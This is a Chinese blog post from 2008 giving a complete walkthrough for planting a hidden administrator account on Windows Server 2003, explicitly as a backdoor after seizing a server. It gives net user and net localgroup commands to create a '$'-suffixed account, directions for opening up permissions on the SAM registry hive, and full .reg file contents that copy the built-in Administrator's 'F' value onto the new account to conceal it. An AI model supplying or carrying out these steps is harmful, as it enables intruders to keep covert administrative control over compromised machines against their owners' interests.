2003下建立隐藏系统用户

| | 应用技巧 2008/03/19 07:30 jarry  不指定

首先说一下,这种方法建的用户重启计算机后就会在计算机管理里边看到,但是删除不掉;当然,知道原理的就可以在注册表中删除了。下面还是来讲讲这种方法吧,因为在拿到一台服务器后用此方法留后门比较有用。

先做准备工作,新建一个用户,名为sxitn$(加上$符号,使用命令net user将查看不到用户),密码为123:

net user sxitn$ 123456 /add

然后把sxitn$加入管理组:

net localgroup administrators sxitn$ /add

然后,开始—>>运行,输入regedt32.exe,找到HKEY_LOCAL_MACHINE下的SAM项下的SAM,点击右键—权限,在安全选项卡中添加用户组Administrators或者当前用户,允许完全控制,应用确定后关闭。

开始—>运行,输入regedit打注册表。找到HKEY_LOCAL_MACHINE—SAM—SAM—Domains—Aliases—Users—Names—sxitn$,记住右边的值的类型—>0×3ef,然后导出,命名为sxitn$.reg;在Users项中找到3ef项,也同样导出,命名为3ef.reg;1f4(administrator默认的项)项也导出,命名为1f4.reg。

用记事本打开1f4.reg,复制:

"F"=hex:02,00,01,00,00,00,00,00,d0,f6,92,be,05,df,c7,01,00,00,00,00,00,00,00,\
  00,80,1c,c5,98,94,2d,c7,01,00,00,00,00,00,00,00,00,10,51,1c,cb,08,df,c7,01,\
  f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,c0,00,01,00,00,00,00,\
  00,00,00,00,00,00,00

用记事本打开3ef.reg,把刚才复制的粘贴到相应的位置。

用记事本打开sxitn$.reg,复制:

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\sxitn$]
@=hex(3ef):

粘贴到3ef.reg最后的位置。最后3ef.reg为:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003EF]
"F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,90,97,6d,19,10,df,c7,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  ef,03,00,00,01,02,00,00,10,00,00,00,00,00,00,00,00,00,00,00,01,00,00,00,00,\
  00,95,7c,4e,2e,20,74
"V"=hex:00,00,00,00,bc,00,00,00,02,00,01,00,bc,00,00,00,0c,00,00,00,00,00,00,\
  00,c8,00,00,00,00,00,00,00,00,00,00,00,c8,00,00,00,00,00,00,00,00,00,00,00,\
  c8,00,00,00,00,00,00,00,00,00,00,00,c8,00,00,00,00,00,00,00,00,00,00,00,c8,\
  00,00,00,00,00,00,00,00,00,00,00,c8,00,00,00,00,00,00,00,00,00,00,00,c8,00,\
  00,00,00,00,00,00,00,00,00,00,c8,00,00,00,00,00,00,00,00,00,00,00,c8,00,00,\
  00,00,00,00,00,00,00,00,00,c8,00,00,00,00,00,00,00,00,00,00,00,c8,00,00,00,\
  08,00,00,00,01,00,00,00,d0,00,00,00,14,00,00,00,00,00,00,00,e4,00,00,00,14,\
  00,00,00,00,00,00,00,f8,00,00,00,04,00,00,00,00,00,00,00,fc,00,00,00,04,00,\
  00,00,00,00,00,00,01,00,14,80,9c,00,00,00,ac,00,00,00,14,00,00,00,44,00,00,\
  00,02,00,30,00,02,00,00,00,02,c0,14,00,44,00,05,01,01,01,00,00,00,00,00,01,\
  00,00,00,00,02,c0,14,00,ff,07,0f,00,01,01,00,00,00,00,00,05,07,00,00,00,02,\
  00,58,00,03,00,00,00,00,00,24,00,44,00,02,00,01,05,00,00,00,00,00,05,15,00,\
  00,00,5b,84,10,ab,37,d9,e9,d7,09,61,8b,28,ef,03,00,00,00,00,18,00,ff,07,0f,\
  00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,00,14,00,5b,03,02,00,\
  01,01,00,00,00,00,00,01,00,00,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,\
  02,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,73,00,78,00,69,00,\
  74,00,6e,00,24,00,01,02,00,00,07,00,00,00,01,00,01,00,c5,3d,41,62,8b,c0,6f,\
  1e,57,d2,4c,dc,4e,20,76,a3,01,00,01,00,47,ad,d7,59,3f,ac,4a,a1,f6,dd,c6,d9,\
  bc,1e,8d,15,01,00,01,00,01,00,01,00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\sxitn$]
@=hex(3ef):

然后保存。删除用户sxitn$:

net user sxitn$ /delete

之后运行3ef.reg导入注册表!打开regedt32.exe把SAM安全选项卡中的administrator删除,然后应用。

这样,隐藏用户就建立好了。

From: 本站原创
, ,
评论(0) 引用(0) 阅读(2405)
已经有0个回复
您也可用OpenID登入:
看完了要说点啥?

昵称(必填)

电邮(必填)

网址(请包含http://)

打开UBB 表情 打开表情 隐藏 记住我 [注册]
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot